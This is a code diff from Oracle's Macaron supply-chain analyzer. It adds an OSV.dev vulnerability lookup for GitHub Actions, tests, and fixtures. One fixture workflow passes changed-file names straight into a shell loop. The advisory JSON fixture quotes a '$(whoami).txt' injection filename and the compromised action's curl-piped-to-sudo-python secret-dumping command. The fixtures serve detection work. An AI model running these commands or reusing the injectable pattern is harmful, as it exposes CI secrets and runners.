b/src/macaron/slsa_analyzer/git_url.py @@ -1,4 +1,4 @@ -# Copyright (c) 2022 - 2024, Oracle and/or its affiliates. All rights reserved. +# Copyright (c) 2022 - 2025, Oracle and/or its affiliates. All rights reserved. # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. """This module provides methods to perform generic actions on Git URLS.""" @@ -907,3 +907,79 @@ def is_empty_repo(git_obj: Git) -> bool: return False except GitCommandError: return True + + +def is_commit_hash(version_str: str) -> bool: + """Check if a given string is a valid Git commit hash. + + A valid Git commit hash is a 40-character long hexadecimal string or + a short version that is at least 7 characters long. The function uses + a regular expression to match these patterns. + + Parameters + ---------- + version_str (str): The string to be checked for validity as a commit hash. + + Returns + ------- + bool: True if the string matches the format of a Git commit hash (7 to 40 + characters long and only contains hexadecimal characters), False otherwise. + + Example + ------- + >>> is_commit_hash('e3a1b6c') + True + >>> is_commit_hash('e3a1b6c8d9b2ff0c9f5f8a0a5d8f4cf2e19b1db3') + True + >>> is_commit_hash('invalid_hash123') + False + >>> is_commit_hash('master') + False + >>> is_commit_hash('main') + False + """ + pattern = r"^[a-f0-9]{7,40}$" + return bool(re.match(pattern, version_str)) + + +def get_tags_via_git_remote(repo: str) -> dict[str, str] | None: + """Retrieve all tags from a given repository using ls-remote. + + Parameters + ---------- + repo: str + The repository to perform the operation on. + + Returns + ------- + dict[str] + A dictionary of tags mapped to their commits, or None if the operation failed.. + """ + tag_data = list_remote_references(["--tags"], repo) + if not tag_data: + return None + tags = {} + + for tag_line in tag_data.splitlines(): + tag_line = tag_line.strip() + if not tag_line: + continue + split = tag_line.split("\t") + if len(split) != 2: + continue + possible_tag = split[1] + if possible_tag.endswith("^{}"): + possible_tag = possible_tag[:-3] + elif possible_tag in tags: + # If a tag already exists, it must be the annotated reference of an annotated tag. + # In that case we skip the tag as it does not point to the proper source commit. + # Note that this should only happen if the tags are received out of standard order. + continue + possible_tag = possible_tag.replace("refs/tags/", "") + if not possible_tag: + continue + tags[possible_tag] = split[0] + + logger.debug("Found %s tags via ls-remote of %s", len(tags), repo) + + return tags diff --git a/src/macaron/slsa_analyzer/package_registry/osv_dev.py b/src/macaron/slsa_analyzer/package_registry/osv_dev.py new file mode 100644 index 000000000..c6f8ee39d --- /dev/null +++ b/src/macaron/slsa_analyzer/package_registry/osv_dev.py @@ -0,0 +1,395 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +"""This module contains implementation of osv.dev service.""" + +import logging +import urllib.parse + +import requests +from packaging import version + +from macaron.config.defaults import defaults +from macaron.errors import APIAccessError +from macaron.json_tools import json_extract +from macaron.slsa_analyzer.git_url import get_tags_via_git_remote, is_commit_hash +from macaron.util import send_post_http_raw + +logger: logging.Logger = logging.getLogger(__name__) + + +class OSVDevService: + """The deps.dev service class.""" + + @staticmethod + def get_vulnerabilities_purl(purl: str) -> list: + """Retrieve vulnerabilities associated with a specific package URL (PURL) by querying the OSV API. + + This method calls the OSV query API with the provided package URL (PURL) to fetch any known vulnerabilities + associated with that package. + + Parameters + ---------- + purl : str + A string representing the Package URL (PURL) of the package to query for vulnerabilities. + + Returns + ------- + list + A list of vulnerabilities under the key "vulns" if any vulnerabilities are found + for the provided package. + + Raises + ------ + APIAccessError + If there are issues with the API URL construction, missing configuration values, or invalid responses. + """ + return OSVDevService.call_osv_query_api({"package": {"purl": purl}}) + + @staticmethod + def get_vulnerabilities_package_name(ecosystem: str, name: str) -> list: + """ + Retrieve vulnerabilities associated with a specific package name and ecosystem by querying the OSV API. + + This method calls the OSV query API with the provided ecosystem and package name to fetch any known vulnerabilities + associated with that package. + + Parameters + ---------- + ecosystem : str + A string representing the ecosystem of the package (e.g., "GitHub Actions", "npm", etc.). + + name : str + A string representing the name of the package to query for vulnerabilities. + + Returns + ------- + list + A list of vulnerabilities under the key "vulns" if any vulnerabilities are found + for the provided ecosystem and package name. + + Raises + ------ + APIAccessError + If there are issues with the API URL construction, missing configuration values, or invalid responses. + """ + return OSVDevService.call_osv_query_api({"package": {"ecosystem": ecosystem, "name": name}}) + + @staticmethod + def get_vulnerabilities_package_name_batch(packages: list) -> list: + """Retrieve vulnerabilities for a batch of packages based on their ecosystem and name. + + This method constructs a batch query to the OSV API to check for vulnerabilities in + multiple packages by querying the ecosystem and package name. It processes the results + while preserving the order of the input packages. If a package has associated vulnerabilities, + it is included in the returned list. + + Parameters + ---------- + packages : list + A list of dictionaries, where each dictionary represents a package with keys: + - "ecosystem" (str): The package's ecosystem (e.g., "GitHub Actions", "npm"). + - "name" (str): The name of the package. + + Returns + ------- + list + A list of packages from the input `packages` list that have associated vulnerabilities. + The order of the returned packages matches the order of the input. + + Raises + ------ + APIAccessError + If there is an issue with querying the OSV API or if the results do not match the expected size. + """ + query_data: dict[str, list] = {"queries": []} + + for pkg in packages: + query_data["queries"].append({"package": {"ecosystem": pkg["ecosystem"], "name": pkg["name"]}}) + + # The results returned by OSV reports the vulnerabilities, preserving the order. + osv_res = OSVDevService.call_osv_querybatch_api(query_data, len(packages)) + results = [] + for index, res in enumerate(osv_res): + if not res: + continue + results.append(packages[index]) + + return results + + @staticmethod + def call_osv_query_api(query_data: dict) -> list: + """Query the OSV (Open Source Vulnerability) knowledge base API with the given data. + + This method sends a POST request to the OSV API and processes the response to extract + information about vulnerabilities based on the provided query data. + + Parameters + ---------- + query_data : dict + A dictionary containing the query parameters to be sent to the OSV API. + The query data should conform to the format expected by the OSV API for querying vulnerabilities. + + Returns + ------- + list + A list of vulnerabilities under the key "vulns" if the query is successful + and the response is valid. + + Raises + ------ + APIAccessError + If there are issues with the API URL construction, missing configuration values, or invalid responses. + """ + section_name = "osv_dev" + if not defaults.has_section(section_name): + return [] + section = defaults[section_name] + + url_netloc = section.get("url_netloc") + if not url_netloc: + raise APIAccessError( + f'The "url_netloc" key is missing in section [{section_name}] of the .ini configuration file.' + ) + url_scheme = section.get("url_scheme", "https") + query_endpoint = section.get("query_endpoint") + if not query_endpoint: + raise APIAccessError( + f'The "query_endpoint" key is missing in section [{section_name}] of the .ini configuration file.' + ) + try: + url = urllib.parse.urlunsplit( + urllib.parse.SplitResult( + scheme=url_scheme, + netloc=url_netloc, + path=query_endpoint, + query="", + fragment="", + ) + ) + except ValueError as error: + raise APIAccessError("Failed to construct the API URL.") from error + + response = send_post_http_raw(url, json_data=query_data, headers=None) + res_obj = None + if response: + try: + res_obj = response.json() + except requests.exceptions.JSONDecodeError as error: + raise APIAccessError(f"Unable to get a valid response from {url}: {error}") from error + + vulns = res_obj.get("vulns") if res_obj else None + + if isinstance(vulns, list): + return vulns + + return [] + + @staticmethod + def call_osv_querybatch_api(query_data: dict, expected_size: int | None = None) -> list: + """Query the OSV (Open Source Vulnerability) knowledge base API in batch mode and retrieves vulnerability data. + + This method sends a batch query to the OSV API and processes the response to extract + a list of results. The method also validates that the number of results matches an + optional expected size. It handles API URL construction, error handling, and response + validation. + + Parameters + ---------- + query_data : dict + A dictionary containing the batch query data to be sent to the OSV API. This data + should conform to the expected format for batch querying vulnerabilities. + + expected_size : int, optional + The expected number of results from the query. If provided, the method checks that + the number of results matches this value. If the actual number of results does + not match the expected size, an exception is raised. Default is None. + + Returns + ------- + list + A list of results from the OSV API containing the vulnerability data that matches + the query parameters. If no valid response is received or the results are + improperly formatted, an empty list is returned. + + Raises + ------ + APIAccessError + If any of the required configuration keys are missing, if the API URL construction + fails, or if the response from the OSV API is invalid or the number of results + does not match the expected size. + """ + section_name = "osv_dev" + if not defaults.has_section(section_name): + return [] + section = defaults[section_name] + + url_netloc = section.get("url_netloc") + if not url_netloc: + raise APIAccessError( + f'The "url_netloc" key is missing in section [{section_name}] of the .ini configuration file.' + ) + url_scheme = section.get("url_scheme", "https") + query_endpoint = section.get("querybatch_endpoint") + if not query_endpoint: + raise APIAccessError( + f'The "query_endpoint" key is missing in section [{section_name}] of the .ini configuration file.' + ) + try: + url = urllib.parse.urlunsplit( + urllib.parse.SplitResult( + scheme=url_scheme, + netloc=url_netloc, + path=query_endpoint, + query="", + fragment="", + ) + ) + except ValueError as error: + raise APIAccessError("Failed to construct the API URL.") from error + + response = send_post_http_raw(url, json_data=query_data, headers=None) + res_obj = None + if response: + try: + res_obj = response.json() + except requests.exceptions.JSONDecodeError as error: + raise APIAccessError(f"Unable to get a valid response from {url}: {error}") from error + + results = res_obj.get("results") if res_obj else None + + if isinstance(results, list): + if expected_size: + if len(results) != expected_size: + raise APIAccessError(f"Unable to get a valid result from {url}") + + return results + + return [] + + @staticmethod + def is_version_affected( + vuln: dict, pkg_name: str, pkg_version: str, ecosystem: str, source_repo: str | None = None + ) -> bool: + """Check whether a specific version of a package is affected by a vulnerability. + + This method parses a vulnerability dictionary to determine whether a given package + version falls within the affected version ranges for the specified ecosystem. The + function handles version comparisons, extracting details about introduced and fixed + versions, and determines if the version is affected by the vulnerability. + + Parameters + ---------- + vuln : dict + A dictionary representing the vulnerability data. It should contain the affected + versions and ranges of the package in question, as well as the details of the + introduced and fixed versions for each affected range. + + pkg_name : str + The name of the package to check for vulnerability. This should match the package + name in the vulnerability data. + + pkg_version : str + The version of the package to check against the vulnerability data. + + ecosystem : str + The ecosystem (e.g., npm, GitHub Actions) to which the package belongs. This should + match the ecosystem in the vulnerability data. + + source_repo : str | None, optional + The source repository URL, used if the `pkg_version` is a commit hash. If provided, + the method will try to retrieve the corresponding version tag from the repository. + Default is None. + + Returns + ------- + bool + Returns True if the given package version is affected by the vulnerability, + otherwise returns False. + + Raises + ------ + APIAccessError + If the vulnerability data is incomplete or malformed, or if the version strings + cannot be parsed correctly. This is raised in cases such as: + - Missing affected version information + - Malformed version data (e.g., invalid version strings) + - Failure to parse the version ranges + """ + # Check if a source repository is provided and if the package version is a commit hash. + # If the package version is a commit hash, retrieve the corresponding tags from the remote repository + # and try to match the commit hash with the tag. If a match is found, update `pkg_version` to the tag. + if source_repo and is_commit_hash(pkg_version): + tags: dict = get_tags_via_git_remote(source_repo) or {} + for tag, commit in tags.items(): + if commit.startswith(pkg_version): + pkg_version = tag + break + + affected = json_extract(vuln, ["affected"], list) + if not affected: + raise APIAccessError(f"Failed to extracted info for {pkg_name}@{pkg_version}.") + + affected_ranges: list | None = None + for rec in affected: + if ( + (affected_pkg := json_extract(rec, ["package", "name"], str)) + and affected_pkg == pkg_name + and (affected_eco := json_extract(rec, ["package", "ecosystem"], str)) + and affected_eco == ecosystem + ): + affected_ranges = json_extract(rec, ["ranges"], list) + break + + if not affected_ranges: + raise APIAccessError(f"Failed to extracted affected versions for {pkg_name}@{pkg_version}.") + + for affected_range in affected_ranges: + events = json_extract(affected_range, ["events"], list) + if not events: + raise APIAccessError(f"Failed to extracted affected versions for {pkg_name}@{pkg_version}.") + + introduced = None + fixed = None + for e in events: + if "introduced" in e: + introduced = e["introduced"] + if "fixed" in e: + fixed = e["fixed"] + + # TODO: convert commit to tag & version + parsed_introduced = version.Version("0") + if introduced: + try: + parsed_introduced = version.Version(introduced) + except version.InvalidVersion as error: + logger.debug(error) + + parsed_fix = None + if fixed: + try: + parsed_fix = version.Version(fixed) + except version.InvalidVersion as error: + logger.debug(error) + + try: + parsed_version = version.Version(pkg_version) + except version.InvalidVersion as error: + raise APIAccessError(f"Failed to parse version string {pkg_version}.") from error + + try: + if parsed_version > parsed_introduced or parsed_version == parsed_introduced: + if parsed_fix is not None: + if parsed_version == parsed_fix or parsed_version > parsed_fix: + continue + + # If a fixed version does not exist, the current version is affected. + return True + # We should not get this error, but if we do, we avoid false positives and continue with the next + # version range. + except ValueError as error: + logger.debug(error) + continue + + # If current version is smaller than the introduced version, it is not affected. + return False diff --git a/tests/integration/cases/oracle-macaron/check_results_policy.dl b/tests/integration/cases/oracle-macaron/check_results_policy.dl new file mode 100644 index 000000000..435715145 --- /dev/null +++ b/tests/integration/cases/oracle-macaron/check_results_policy.dl @@ -0,0 +1,11 @@ +/* Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. */ +/* Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. */ + +#include "prelude.dl" + +Policy("test_policy", component_id, "") :- + check_passed(component_id, "mcn_githubactions_vulnerabilities_1"). + +apply_policy_to("test_policy", component_id) :- + is_component(component_id, purl), + match("pkg:github.com/oracle/macaron@.*", purl). diff --git a/tests/integration/cases/log4j_release_pipeline/test.yaml b/tests/integration/cases/oracle-macaron/test.yaml similarity index 56% rename from tests/integration/cases/log4j_release_pipeline/test.yaml rename to tests/integration/cases/oracle-macaron/test.yaml index 8cb0433c4..adaddb1eb 100644 --- a/tests/integration/cases/log4j_release_pipeline/test.yaml +++ b/tests/integration/cases/oracle-macaron/test.yaml @@ -1,21 +1,22 @@ -# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. description: | - Analyzing with PURL and repository path without dependency resolution. + Analyzing the staging branch of the Macaron repo to detect vulnerable GitHub Actions. tags: - macaron-python-package -- tutorial steps: - name: Run macaron analyze kind: analyze options: command_args: - - -purl - - pkg:maven/org.apache.logging.log4j/log4j-core@3.0.0-beta3 + - -rp + - https://github.com/oracle/macaron + - -b + - staging - name: Run macaron verify-policy to verify passed/failed checks kind: verify options: - policy: policy.dl + policy: check_results_policy.dl diff --git a/tests/integration/cases/log4j_release_pipeline/policy.dl b/tests/integration/cases/org_apache_logging_log4j/policy_purl.dl similarity index 94% rename from tests/integration/cases/log4j_release_pipeline/policy.dl rename to tests/integration/cases/org_apache_logging_log4j/policy_purl.dl index 725afc643..f81ac7b07 100644 --- a/tests/integration/cases/log4j_release_pipeline/policy.dl +++ b/tests/integration/cases/org_apache_logging_log4j/policy_purl.dl @@ -10,6 +10,7 @@ Policy("test_policy", component_id, "") :- check_passed_with_confidence(component_id, "mcn_find_artifact_pipeline_1", confidence), confidence = 0.7, // Medium confidence because the pipeline was not found from a provenance. check_passed(component_id, "mcn_version_control_system_1"), + check_passed(component_id, "mcn_githubactions_vulnerabilities_1"), check_failed(component_id, "mcn_provenance_available_1"), check_failed(component_id, "mcn_provenance_derived_commit_1"), check_failed(component_id, "mcn_provenance_derived_repo_1"), diff --git a/tests/integration/cases/org_apache_logging_log4j/policy_repo_url.dl b/tests/integration/cases/org_apache_logging_log4j/policy_repo_url.dl new file mode 100644 index 000000000..00b141481 --- /dev/null +++ b/tests/integration/cases/org_apache_logging_log4j/policy_repo_url.dl @@ -0,0 +1,10 @@ +/* Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. */ +/* Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. */ + +#include "prelude.dl" + +Policy("test_policy", component_id, "") :- + check_passed(component_id, "mcn_githubactions_vulnerabilities_1"). + +apply_policy_to("test_policy", component_id) :- + is_repo_url(component_id, "https://github.com/apache/logging-log4j2"). diff --git a/tests/integration/cases/org_apache_logging_log4j/test.yaml b/tests/integration/cases/org_apache_logging_log4j/test.yaml new file mode 100644 index 000000000..8da5f01b6 --- /dev/null +++ b/tests/integration/cases/org_apache_logging_log4j/test.yaml @@ -0,0 +1,33 @@ +# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +description: | + Analyzing with PURL and repository path without dependency resolution. + This test case is used in two tutorials: `detect-manual-upload-java-dep` and `detect-vuln-gh-actions`. + +tags: +- macaron-python-package +- tutorial + +steps: +- name: Run macaron analyze with PURL + kind: analyze + options: + command_args: + - -purl + - pkg:maven/org.apache.logging.log4j/log4j-core@3.0.0-beta3 +- name: Run macaron verify-policy to verify passed/failed checks + kind: verify + options: + policy: policy_purl.dl + +- name: Run macaron analyze with repo path + kind: analyze + options: + command_args: + - -rp + - https://github.com/apache/logging-log4j2 +- name: Run macaron verify-policy to verify passed/failed checks + kind: verify + options: + policy: policy_repo_url.dl diff --git a/tests/slsa_analyzer/checks/resources/github/workflow_files/Bradford1040_mainsail_check_locale.yml b/tests/slsa_analyzer/checks/resources/github/workflow_files/Bradford1040_mainsail_check_locale.yml new file mode 100644 index 000000000..03fc8e8c5 --- /dev/null +++ b/tests/slsa_analyzer/checks/resources/github/workflow_files/Bradford1040_mainsail_check_locale.yml @@ -0,0 +1,60 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +name: Check Translations +on: + pull_request_target: + types: [synchronize, opened] + paths: + - src/locales/** + +jobs: + check_translations: + runs-on: ubuntu-latest + steps: + - name: Install jq + run: sudo apt install -y jq + + - name: Fetch repo + uses: actions/checkout@v4 + with: + fetch-depth: 0 + ref: ${{ github.event.pull_request.head.sha }} + + - name: Install node + uses: actions/setup-node@v3 + with: + node-version: 20 + + - name: Install dependencies + run: npm ci + + - name: Get changed files + id: changed-files + uses: tj-actions/changed-files@v41 + with: + sha: ${{ github.event.pull_request.head.sha }} + files: src/locales/*.json + + - name: Run i18n-extract on changed locale files + id: i18n-extract + env: + OUTPUT: '' + run: | + mkdir ./i18n-extract + for file in ${{ steps.changed-files.outputs.all_changed_files }}; do + npm run i18n-extract -- --languageFiles=src/locales/${file##*/} --output=i18n-extract/${file##*/} + MISSING=$(cat i18n-extract/${file##*/} | jq '.missingKeys | length') + UNUSED=$(cat i18n-extract/${file##*/} | jq '.unusedKeys | length') + echo "$file=|${file##*/}|${MISSING}|${UNUSED}|" >> $GITHUB_OUTPUT + done + - name: Comment PR + uses: thollander/actions-comment-pull-request@v2 + with: + message: | + Language file analysis report: + |File|Missing Keys|Unused Keys| + |:---|---:|---:| + ${{join(steps.i18n-extract.outputs.*, ' + ')}} + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/tests/slsa_analyzer/checks/resources/osv_files/tj-actions_changed-files_query.json b/tests/slsa_analyzer/checks/resources/osv_files/tj-actions_changed-files_query.json new file mode 100644 index 000000000..d9ff7d01d --- /dev/null +++ b/tests/slsa_analyzer/checks/resources/osv_files/tj-actions_changed-files_query.json @@ -0,0 +1,229 @@ +{ + "vulns": [ + { + "id": "GHSA-mcph-m25j-8j63", + "summary": "tj-actions/changed-files has Potential Actions command injection in output filenames (GHSL-2023-271)", + "details": "### Summary\nThe `tj-actions/changed-files` workflow allows for command injection in changed filenames, allowing an attacker to execute arbitrary code and potentially leak secrets.\n\n### Details\nThe [`changed-files`](https://github.com/tj-actions/changed-files) action returns a list of files changed in a commit or pull request which provides an `escape_json` input [enabled by default](https://github.com/tj-actions/changed-files/blob/94549999469dbfa032becf298d95c87a14c34394/action.yml#L136), only escapes `\"` for JSON values. \n\nThis could potentially allow filenames that contain special characters such as `;` and \\` (backtick) which can be used by an attacker to take over the [GitHub Runner](https://docs.github.com/en/actions/using-github-hosted-runners/about-github-hosted-runners) if the output value is used in a raw fashion (thus being directly replaced before execution) inside a `run` block. By running custom commands an attacker may be able to steal **secrets** such as `GITHUB_TOKEN` if triggered on other events than `pull_request`. For example on `push`.\n\n#### Proof of Concept\n\n1. Submit a pull request to a repository with a new file injecting a command. For example `$(whoami).txt` which is a valid filename.\n2. Upon approval of the workflow (triggered by the pull request), the action will get executed and the malicious pull request filename will flow into the `List all changed files` step below.\n\n```yaml\n - name: List all changed files\n run: |\n for file in ${{ steps.changed-files.outputs.all_changed_files }}; do\n echo \"$file was changed\"\n done\n```\n\nExample output:\n\n```yaml\n##[group]Run for file in $(whoami).txt; do\n for file in $(whoami).txt; do\n echo \"$file was changed\"\n done\nshell: /usr/bin/bash -e {0}\n##[endgroup]\nrunner.txt was changed\n```\n\n### Impact\n\nThis issue may lead to arbitrary command execution in the GitHub Runner.\n\n### Resolution\n- A new `safe_output` input would be enabled by default and return filename paths escaping special characters like ;, ` (backtick), $, (), etc for bash environments.\n\n- A safe recommendation of using environment variables to store unsafe outputs.\n\n```yaml\n- name: List all changed files\n env:\n ALL_CHANGED_FILES: ${{ steps.changed-files.outputs.all_changed_files }}\n run: |\n for file in \"$ALL_CHANGED_FILES\"; do\n echo \"$file was changed\"\n done\n```\n\n### Resources\n\n* [Keeping your GitHub Actions and workflows secure Part 2: Untrusted input](https://securitylab.github.com/research/github-actions-untrusted-input/)\n* [Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/)", + "aliases": [ + "CVE-2023-51664" + ], + "modified": "2024-01-02T16:41:27Z", + "published": "2024-01-02T16:41:27Z", + "related": [ + "CVE-2023-51664" + ], + "database_specific": { + "github_reviewed_at": "2024-01-02T16:41:27Z", + "github_reviewed": true, + "severity": "HIGH", + "cwe_ids": [ + "CWE-74", + "CWE-77" + ], + "nvd_published_at": "2023-12-27T17:15:08Z" + }, + "references": [ + { + "type": "WEB", + "url": "https://github.com/tj-actions/changed-files/security/advisories/GHSA-mcph-m25j-8j63" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51664" + }, + { + "type": "WEB", + "url": "https://github.com/tj-actions/changed-files/commit/0102c07446a3cad972f4afcbd0ee4dbc4b6d2d1b" + }, + { + "type": "WEB", + "url": "https://github.com/tj-actions/changed-files/commit/716b1e13042866565e00e85fd4ec490e186c4a2f" + }, + { + "type": "WEB", + "url": "https://github.com/tj-actions/changed-files/commit/ff2f6e6b91913a7be42be1b5917330fe442f2ede" + }, + { + "type": "PACKAGE", + "url": "https://github.com/tj-actions/changed-files" + } + ], + "affected": [ + { + "package": { + "name": "tj-actions/changed-files", + "ecosystem": "GitHub Actions" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "41" + } + ] + } + ], + "database_specific": { + "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/01/GHSA-mcph-m25j-8j63/GHSA-mcph-m25j-8j63.json" + } + } + ], + "schema_version": "1.6.0", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N" + } + ] + }, + { + "id": "GHSA-mrrh-fwg8-r2c3", + "summary": "tj-actions changed-files through 45.0.7 allows remote attackers to discover secrets by reading actions logs.", + "details": "### Summary \nA supply chain attack compromised the **tj-actions/changed-files** GitHub Action, impacting over 23,000 repositories. Attackers retroactively modified multiple version tags to reference a malicious commit, exposing CI/CD secrets in workflow logs. The vulnerability existed between **March 14 and March 15, 2025**, and has since been mitigated. This poses a significant risk of unauthorized access to sensitive information.\n\nThis has been patched in [v46.0.1](https://github.com/tj-actions/changed-files/releases/tag/v46.0.1).\n\n### Details \nThe attack involved modifying the **tj-actions/changed-files** GitHub Action to execute a malicious Python script. This script extracted secrets from the Runner Worker process memory and printed them in GitHub Actions logs, making them publicly accessible in repositories with public workflow logs. \n\n#### Key Indicators of Compromise (IoC): \n- **Malicious commit**: [0e58ed8671d6b60d0890c21b07f8835ace038e67](https://github.com/tj-actions/changed-files/commit/0e58ed8671d6b60d0890c21b07f8835ace038e67) \n- **Retroactively updated tags pointing to the malicious commit**: \n - `v1.0.0`: 0e58ed8671d6b60d0890c21b07f8835ace038e67 \n - `v35.7.7-sec`: 0e58ed8671d6b60d0890c21b07f8835ace038e67 \n - `v44.5.1`: 0e58ed8671d6b60d0890c21b07f8835ace038e67 \n\n#### Malicious Code Execution: \nThe malicious script downloaded and executed a Python script that scanned memory for secrets, base64-encoded them, and logged them in the build logs: \n```\nB64_BLOB=`curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3`\n```\n\nThis script targeted the **Runner Worker process**, extracting and exfiltrating its memory contents. \n\n### Proof of Concept (PoC) \n#### Steps to Reproduce: \n1. Create a GitHub Actions workflow using the **tj-actions/changed-files** action: \n\n```yml\nname: \"tj-action changed-files incident\"\non:\n pull_request:\n branches:\n - main\njobs:\n changed_files:\n runs-on: ubuntu-latest\n steps:\n - name: Get changed files\n id: changed-files\n uses: tj-actions/changed-files@0e58ed8671d6b60d0890c21b07f8835ace038e67\n```\n2. Run the workflow and inspect the logs in the Actions tab. \n3. Vulnerable workflows may display secrets in the logs. \n\n#### Detection: \nAnalyze network traffic using [Harden-Runner](https://github.com/step-security/harden-runner), which detects unauthorized outbound requests to: \n- `gist.githubusercontent.com` \n\nLive reproduction logs: \n🔗 [Harden-Runner Insights](https://app.stepsecurity.io/github/step-security/github-actions-goat/actions/runs/13866127357) \n\nThis attack was detected by **StepSecurity** when anomaly detection flagged an unauthorized outbound network call to `gist.githubusercontent.com`. \n\n### Duration of Vulnerability \nThe vulnerability was active between **March 14 and March 15, 2025**. \n\n### Action Required \n1. **Review your workflows executed between March 14 and March 15**: \n - Check the **changed-files** section for unexpected output. \n - Decode suspicious output using the following command: \n ```\n echo 'xxx' | base64 -d | base64 -d\n ```\n - If the output contains sensitive information (e.g., tokens or secrets), revoke and rotate those secrets immediately. \n\n2. **Update workflows referencing the compromised commit**: \n - If your workflows reference the malicious commit directly by its SHA, update them immediately to avoid using the compromised version. \n\n3. **Tagged versions**: \n - If you are using tagged versions (e.g., `v35`, `v44.5.1`), no action is required as these tags have been updated and are now safe to use. \n\n4. **Rotate potentially exposed secrets**: \n - As a precaution, rotate any secrets that may have been exposed during this timeframe to ensure the continued security of your workflows. \n\n### Impact \n- **Type of vulnerability**: Supply chain attack, Secrets exposure, Information leakage \n- **Who is impacted**: \n - Over 23,000 repositories using **tj-actions/changed-files**. \n - Organizations with public repositories are at the highest risk, as their logs may already be compromised. \n- **Potential consequences**: \n - Theft of CI/CD secrets (API keys, cloud credentials, SSH keys). \n - Unauthorized access to source code, infrastructure, and production environments. \n - Credential leaks in public repositories, enabling further supply chain attacks.", + "aliases": [ + "CVE-2025-30066" + ], + "modified": "2025-03-24T14:23:37Z", + "published": "2025-03-15T06:30:34Z", + "database_specific": { + "github_reviewed_at": "2025-03-15T16:39:06Z", + "github_reviewed": true, + "severity": "HIGH", + "cwe_ids": [ + "CWE-506" + ], + "nvd_published_at": "2025-03-15T06:15:12Z" + }, + "references": [ + { + "type": "WEB", + "url": "https://github.com/tj-actions/changed-files/security/advisories/GHSA-mw4p-6x4p-x5m5" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30066" + }, + { + "type": "WEB", + "url": "https://github.com/espressif/arduino-esp32/issues/11127" + }, + { + "type": "WEB", + "url": "https://github.com/modal-labs/modal-examples/issues/1100" + }, + { + "type": "WEB", + "url": "https://github.com/tj-actions/changed-files/issues/2463" + }, + { + "type": "WEB", + "url": "https://github.com/tj-actions/changed-files/issues/2464" + }, + { + "type": "WEB", + "url": "https://github.com/tj-actions/changed-files/issues/2477" + }, + { + "type": "WEB", + "url": "https://github.com/chains-project/maven-lockfile/pull/1111" + }, + { + "type": "WEB", + "url": "https://github.com/rackerlabs/genestack/pull/903" + }, + { + "type": "WEB", + "url": "https://www.wiz.io/blog/github-action-tj-actions-changed-files-supply-chain-attack-cve-2025-30066" + }, + { + "type": "WEB", + "url": "https://www.sweet.security/blog/cve-2025-30066-tj-actions-supply-chain-attack" + }, + { + "type": "WEB", + "url": "https://www.stream.security/post/github-action-supply-chain-attack-exposes-secrets-what-you-need-to-know-and-how-to-respond" + }, + { + "type": "WEB", + "url": "https://www.stepsecurity.io/blog/harden-runner-detection-tj-actions-changed-files-action-is-compromised" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/alerts/2025/03/18/supply-chain-compromise-third-party-github-action-cve-2025-30066" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20250315060250/https://github.com/tj-actions/changed-files/issues/2463" + }, + { + "type": "WEB", + "url": "https://sysdig.com/blog/detecting-and-mitigating-the-tj-actions-changed-files-supply-chain-attack-cve-2025-30066" + }, + { + "type": "WEB", + "url": "https://semgrep.dev/blog/2025/popular-github-action-tj-actionschanged-files-is-compromised" + }, + { + "type": "WEB", + "url": "https://news.ycombinator.com/item?id=43367987" + }, + { + "type": "WEB", + "url": "https://github.com/tj-actions/changed-files/releases/tag/v46.0.1" + }, + { + "type": "WEB", + "url": "https://github.com/tj-actions/changed-files/blob/45fb12d7a8bedb4da42342e52fe054c6c2c3fd73/README.md?plain=1#L20-L28" + }, + { + "type": "PACKAGE", + "url": "https://github.com/tj-actions/changed-files" + }, + { + "type": "WEB", + "url": "https://github.com/github/docs/blob/962a1c8dccb8c0f66548b324e5b921b5e4fbc3d6/content/actions/security-for-github-actions/security-guides/security-hardening-for-github-actions.md?plain=1#L191-L193" + }, + { + "type": "WEB", + "url": "https://blog.gitguardian.com/compromised-tj-actions" + } + ], + "affected": [ + { + "package": { + "name": "tj-actions/changed-files", + "ecosystem": "GitHub Actions" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "46.0.1" + } + ] + } + ], + "database_specific": { + "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-mrrh-fwg8-r2c3/GHSA-mrrh-fwg8-r2c3.json", + "last_known_affected_version_range": "<= 45.0.7" + } + } + ], + "schema_version": "1.6.0", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" + } + ] + } + ] +} diff --git a/tests/slsa_analyzer/checks/resources/osv_files/tj-actions_changed-files_querybatch.json 